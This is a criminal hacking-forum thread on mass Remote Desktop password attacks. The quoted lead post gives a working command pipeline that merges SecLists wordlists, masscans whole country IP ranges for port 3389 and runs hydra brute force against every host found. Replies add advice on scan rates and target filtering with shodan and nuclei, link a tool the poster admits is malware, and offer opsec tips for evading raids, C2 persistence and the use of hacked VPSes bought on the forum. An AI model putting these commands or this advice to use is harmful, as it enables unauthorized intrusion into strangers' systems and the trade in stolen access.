• XSS.stack #1 – первый литературный журнал от юзеров форума

Мануал/Книга RDP attack

Отслеживать
Zodiac сказал(а):
Prokhorenco

In this:


What will be your best suggestion for the --rate <value>

as per your experience what will be the best value ?
It depends on your server. My VPS can only handle --rate 50000 but a dedicated server or better VPS will be handle more.

More $$$ = More rate :)
 
qGodless сказал(а):
were


where do you get ip's i tried shodan but only false positives
I got mine from shodan and then used nuclei to remove false positives. I also just use masscan and nuclei. See my post here: https://xss.pro/threads/86465/post-613079
 
Hydra has limits on passwords and the list of IP addresses it can handle. Have you managed to increase these limits in any way? When attempting to make small password guesses, it starts brute-forcing and returns an error.
Is it possible to adjust it for proper functioning with a large number of IP addresses and a large list of usernames and passwords, as specified in the instructions? It's currently not working for me. Can a kind person help me?
 
cooltemp сказал(а):
Hydra has limits on passwords and the list of IP addresses it can handle. Have you managed to increase these limits in any way? When attempting to make small password guesses, it starts brute-forcing and returns an error.
Is it possible to adjust it for proper functioning with a large number of IP addresses and a large list of usernames and passwords, as specified in the instructions? It's currently not working for me. Can a kind person help me?
Try NLBrute. it's designed for mass campaigns: https://anonfiles.com/b0w3jf29ze/NLBrute_zip
 
Prokhorenco I was about to download NLBrute from the anonfile link you provided but it's being flagged as malware for some reason.

Anyhow, I noticed that you have mentioned about using VPS while trying out these brute force attacks and I understand that using a vps adds on an extra layer of security but if one does not have any vps, only a mere vpn, how badly would it affect my opsec?

Plus I know the issue with most VPNs is that you do not get port forwarding, so no call backs from your beacon to the C2 you are hosting, I know big issue, but currently I do not have access to a vps and in order to afford one, I need to find something to sell/ earn money from, so is there a way to gain persistant access if you do not have a VPS to host the C2 on while using a VPN or another way other than gaining persistance via a C2?
 
molotov477 сказал(а):
Prokhorenco I was about to download NLBrute from the anonfile link you provided but it's being flagged as malware for some reason.

Anyhow, I noticed that you have mentioned about using VPS while trying out these brute force attacks and I understand that using a vps adds on an extra layer of security but if one does not have any vps, only a mere vpn, how badly would it affect my opsec?

Plus I know the issue with most VPNs is that you do not get port forwarding, so no call backs from your beacon to the C2 you are hosting, I know big issue, but currently I do not have access to a vps and in order to afford one, I need to find something to sell/ earn money from, so is there a way to gain persistant access if you do not have a VPS to host the C2 on while using a VPN or another way other than gaining persistance via a C2?

Prokhorenco I was about to download NLBrute from the anonfile link you provided but it's being flagged as malware for some reason.
That's because it technically is.
Anyhow, I noticed that you have mentioned about using VPS while trying out these brute force attacks and I understand that using a vps adds on an extra layer of security but if one does not have any vps, only a mere vpn, how badly would it affect my opsec?
I would recommend against hacking from your local network/machine/VPN in terms of using automated tooling. Mainly for opsec reasons but also because it's extremely limiting. Using a server we can run tools 24/7 and not need our computers turned on meaning we can turn off our machines to go out and live life and have the machine be encrypted and safe in case of raids. Servers also will have more bandwidth than residential connections and depending on what you buy might have more specs (CPU, RAM and storage) than you.
 
Prokhorenco сказал(а):
That's because it technically is.

I would recommend against hacking from your local network/machine/VPN in terms of using automated tooling. Mainly for opsec reasons but also because it's extremely limiting. Using a server we can run tools 24/7 and not need our computers turned on meaning we can turn off our machines to go out and live life and have the machine be encrypted and safe in case of raids. Servers also will have more bandwidth than residential connections and depending on what you buy might have more specs (CPU, RAM and storage) than you.
In that case, are there any alternatives for free VPS that you could potentially use?
Also what are some of the best practices for them? I know most professionals in this field use VPS to work but since I have never set one up, I have no idea, Lets say I buy/ rent a linux based VPS up, now do I do a fresh install of kali or whatever distro I use as my main machine on it? or do I just stash some automated tools on it to use and the rest I use it as a proxy from my local machine to do whatever it is that I want to do?

If you can give a detailed answer or refer to a post that tells you how to set up a VPS for such purposes, that will be great!
 
molotov477 сказал(а):
In that case, are there any alternatives for free VPS that you could potentially use?
Also what are some of the best practices for them? I know most professionals in this field use VPS to work but since I have never set one up, I have no idea, Lets say I buy/ rent a linux based VPS up, now do I do a fresh install of kali or whatever distro I use as my main machine on it? or do I just stash some automated tools on it to use and the rest I use it as a proxy from my local machine to do whatever it is that I want to do?

If you can give a detailed answer or refer to a post that tells you how to set up a VPS for such purposes, that will be great!
just get a hacked vps to start/learn with there is a ton on this forum
 
qGodless сказал(а):
just get a hacked vps to start/learn with there is a ton on this forum
Got it, I will try and do that right away.

For Opsec purposes, should one use a vpn to connect to the VPS or connect directly from own internet and clear connections logs on the way out?
 
Prokhorenco сказал(а):
A method for simple Remote Desktop (RDP) password attack.

Download passwords:
Bash: 
git clone https://github.com/danielmiessler/SecLists.git

Output all usernames into one file:
Bash: 
find SecLists/Usernames/ -type f -exec cat {} + > usernames.txt

Output all passwords into one file:
Bash: 
find SecLists/Passwords/ -type f -exec cat {} + > passwords.txt

Scan for RDP:
Bash: 
sudo masscan -Pn -sS -iL ranges.txt --rate 6000 -p3389 --open-only --excludefile block.txt | grep -Eo '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+' > targets.txt

Password attack:
Bash: 
hydra -L usernames.txt -P passwords.txt -M targets.txt -t 16 rdp -o results

ranges.txt: https://lite.ip2location.com/ip-address-ranges-by-country
block.txt: https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2
а с чего гидра новые версии рдп брутить то стала? вы прежде чем писать статью смотрели хоть работает нет
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх